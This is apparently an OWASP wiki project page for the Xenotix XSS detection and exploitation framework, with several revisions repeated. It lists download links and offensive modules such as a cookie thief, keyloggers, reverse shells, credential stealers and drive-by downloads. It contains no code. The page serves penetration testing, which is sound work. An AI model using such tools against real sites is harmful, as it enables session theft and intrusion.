OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshX2VsRG4tLUp3MzQ/view?usp=sharing Download V6 From GDrive]
MD5: 54a2335e35c47b1e5a87b163088c63ff

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Introduction to OWASP Xenotix XSS Exploit Framework'''

{{#ev:youtube|C15po4TK4Os}}

'''Detecting XSS in GET Request'''

{{#ev:youtube|fPC_stgovcU}}

'''Detecting XSS with GET Request Fuzzer'''

{{#ev:youtube|K5nbgvXvY1g}}

'''Detecting XSS with POST Request Fuzzer'''

{{#ev:youtube|AqdEG-vsywQ}}

'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''

{{#ev:youtube|J_qdm_-XVV0}}

'''Detecting XSS with Advanced Request Fuzzer'''

{{#ev:youtube|R8AgEWPFJ1g}}

'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-11-26T04:18:40Z

Ajin Abraham:

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

{{#ev:youtube|J1phYXmLX8w}}

''' CLUBHACK 2012 '''

{{#ev:youtube|NYZLP0q7-y4}}

</div>

= Screenshots =

{|
|-
|
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]]
|
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]
|-
|
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]
|
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]
|}

=Downloads=

<div style="font-size:120%;border:none;margin: 0;color:#000">

====IMPORTANT====
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.

====Latest Release====

[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip]]
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshX2VsRG4tLUp3MzQ/view?usp=sharing Download V6 From GDrive]
MD5: 54a2335e35c47b1e5a87b163088c63ff

====Requirements====
* Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]
====Older Versions====
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip
====Source====
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/
</div>
= Documentation =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''Introduction to OWASP Xenotix XSS Exploit Framework'''

{{#ev:youtube|C15po4TK4Os}}

'''Detecting XSS in GET Request'''

{{#ev:youtube|fPC_stgovcU}}

'''Detecting XSS with GET Request Fuzzer'''

{{#ev:youtube|K5nbgvXvY1g}}

'''Detecting XSS with POST Request Fuzzer'''

{{#ev:youtube|AqdEG-vsywQ}}

'''Detecting XSS with POST Request Fuzzer in an Authenticated Page'''

{{#ev:youtube|J_qdm_-XVV0}}

'''Detecting XSS with Advanced Request Fuzzer'''

{{#ev:youtube|R8AgEWPFJ1g}}

'''XSS Filter Bypass, Detection and Explanation with OWASP Xenotix'''

{{#ev:youtube|loZSdedJnqc}}

'''Version 4.5 Videos'''

{{#ev:youtube|jm1-_nTlhzY}}

'''Version 4 Videos'''

{{#ev:youtube|dCo5BCJWOdA}}

'''Version 3 Videos'''

{{#ev:youtube|CJEgO4_kd-8}}
{{#ev:youtube|owfF9C_Xerw}}
{{#ev:youtube|i8c3kf4t6A8}}
{{#ev:youtube|IT-8IH3yRrA}}
{{#ev:youtube|cgLGgVWvi9Y}}

</div>

= Roadmap =

<div style="font-size:120%;border:none;margin: 0;color:#000">
''' WHAT'S NEW! '''

{{#ev:youtube|RhGVuus_NJw}}
==V6 Changes==

* Intelli Fuzzer
* Context Based Fuzzer
* Blind Fuzzer
* HTA Network Configuration
* HTA Drive-By
* HTA Drive-By Reverse Shell
* JSFuck 6 Char Encoder
* jjencode Encoder
* aaencode Encoder
* IP to Location
* IP to GeoLocation
* IP Hinting
* Download Spoofer
* HTML5 Geolocation API
* Reverse TCP Shell Addon (Linux)
* OAuth 1.0a Request Scanner
* 4800+ Payloads
* SSL Error Fixed

==V5 Changes==
* Xenotix Scripting Engine
* Xenotix API
* V4.5 Bug Fixes
* GET Network IP (Information Gathering)
* QR Code Generator for Xenotix xook
* HTML5 WebCam Screenshot(Exploitation Module)
* HTML5 Get Page Screenshot (Exploitation Module)
* Find Feature in View Source.
* Improved Payload Count to 1630
* Name Changes

==V4.5 Changes==

* JavaScript Beautifier
* Pause and Resume support for Scan
* Jump to Payload
* Cookie Support for POST Request
* Cookie Support and Custom Headers for Header Scanner
* Added TRACE method Support
* Improved Interface
* Better Proxy Support
* WAF Fingerprinting
* Load Files <exploitation module>
* Hash Calculator
* Hash Detector
</div>

= XSS Protection Cheat Sheet =

[[Image:Xss_protection.png|center]]

The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.

VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&pid=explorer&efh=false&a=v&chrome=false&embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]

= Get Involved =

<div style="font-size:120%;border:none;margin: 0;color:#000">

Involvement in the development of Xenotix is highly encouraged!

Here are some of the ways you can help:

==Support Us==

*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013 Xenotix @ OpenSecurity]]

==Feedback & Queries==

* Do you have any issues with it?
* Do you find any design flows or errors?
* Do you need help in using it?
* Do you have something to tell about it?

Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform

==Development==

Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org'''
If you actively contribute to Xenotix then you will be invited to join the project.

</div>

__NOTOC__ <headertabs />

[[Category:OWASP Project]] [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]

OWASP Xenotix XSS Exploit Framework

2014-11-26T04:14:02Z

Ajin Abraham: added website

=Main=

<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div>

{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-
| valign="top" style="border-right: 1px dotted gray;padding-right:20px;" |

==OWASP Xenotix XSS Exploit Framework 6==

[[Image:Xen6.png|left|550px]]
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.

<paypal>OWASP Xenotix XSS Exploit Framework</paypal>

== LICENSING ==
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.

| valign="top" style="padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;" |

== PRESENTATIONS ==

'''DEFCON DCG Banglore 2013'''
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]

'''BlackHat Europe Arsenal 2013'''
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]

'''Nulcon Goa 2013'''
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]
'''ClubHack 2012'''
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]

== PROJECT LEADER ==

Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]

== PROJECT WEBSITE ==

*http://xenotix.in

== AWARDS ==

[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]

| valign="top" style="padding-left:25px;width:175px;" |

== QUICK DOWNLOAD ==

[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.rar]]

== NEWS AND EVENTS ==
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]

== RELATED PROJECTS ==

* [[OWASP_Xelenium_Project]]
* [[ZAP]]
* [[OWASP_XSSER]]

== Ohloh ==

*https://www.ohloh.net/p/OWASP-Xenotix-XSS-Exploit-Framework

== CLASSIFICATIONS ==

{| width="200" cellpadding="2"
|-
| align="center" valign="top" width="50%" rowspan="2"| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]
| align="center" valign="top" width="50%"| [[File:Owasp-builders-small.png|link=]]
|-
| align="center" valign="top" width="50%"| [[File:Owasp-breakers-small.png|link=]]
|-
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]
|-
| colspan="2" align="center" | [[File:Project_Type_Files_CODE.jpg|link=]]
|}

|}

= Features =

<div style="font-size:120%;border:none;margin: 0;color:#000">

'''SCANNER MODULES'''

*GET Request Manual Mode
*GET Request Auto Mode
*Multiple Parameter Scanner
*GET Request Fuzzer
*POST Request Fuzzer
*Advanced Request Fuzzer
*OAuth 1.0a Request Scanner
*DOM Scanner
*Hidden Parameter Detector

'''INFORMATION GATHERING MODULES'''

*WAF Fingerprinting
*Victim Fingerprinting
**IP to Location
**IP to GeoLocation
*Network
**Network IP (WebRTC)
**Ping Scan
**Port Scan
**Internal Network Scan
*Browser
**Fingerprinting
**Features Detector

'''EXPLOITATION MODULES'''

*Send Message
*Cookie Thief
*Keylogger
*HTML5 DDoSer
*Load File
*Grab Page Screenshot
*JavaScript Shell
*Reverse HTTP WebShell
*Metasploit Browser Exploit
*Social Engineering
**Phisher
**Tabnabbing
**Live WebCam Screenshot
**Download Spoofer
**Geolocation HTML5 API
**Java Applet Drive-By (Windows)
**Java Applet Drive-By Reverse Shell (Windows)
**HTA Network Configuration (Windows, IE)
**HTA Drive-By (Windows, IE)
**HTA Drive-By Reverse Shell (Windows, IE)
*Firefox Addons
**Reverse TCP Shell Addon (Windows, Persistent)
**Reverse TCP Shell Addon (Linux, Persistent)
**Session Stealer Addon (Persistent)
**Keylogger Addon (Persistent)
**DDoSer Addon (Persistent)
**Linux Credential File Stealer Addon (Persistent)
**Drop and Execute Addon (Persistent)

'''AUXILIARY MODULES'''
*WebKit Developer Tools
*Encoder/Decoder
*JavaScript Encoders
**JSFuck 6 Char Encoder
**jjencode Encoder
**aaencode Encoder
*JavaScript Beautifier
*Hash Calculator
*Hash Detector
*View Injected JavaScript
*View XSS Payloads

'''XENOTIX SCRIPTING ENGINE'''
* Xenotix API
* IronPython Scripting Support
* Trident and Gecko Web Engine Support

</div>

= Conference Talks =

<div style="font-size:120%;border:none;margin: 0;color:#000">

''' NULLCON GOA 2013 '''

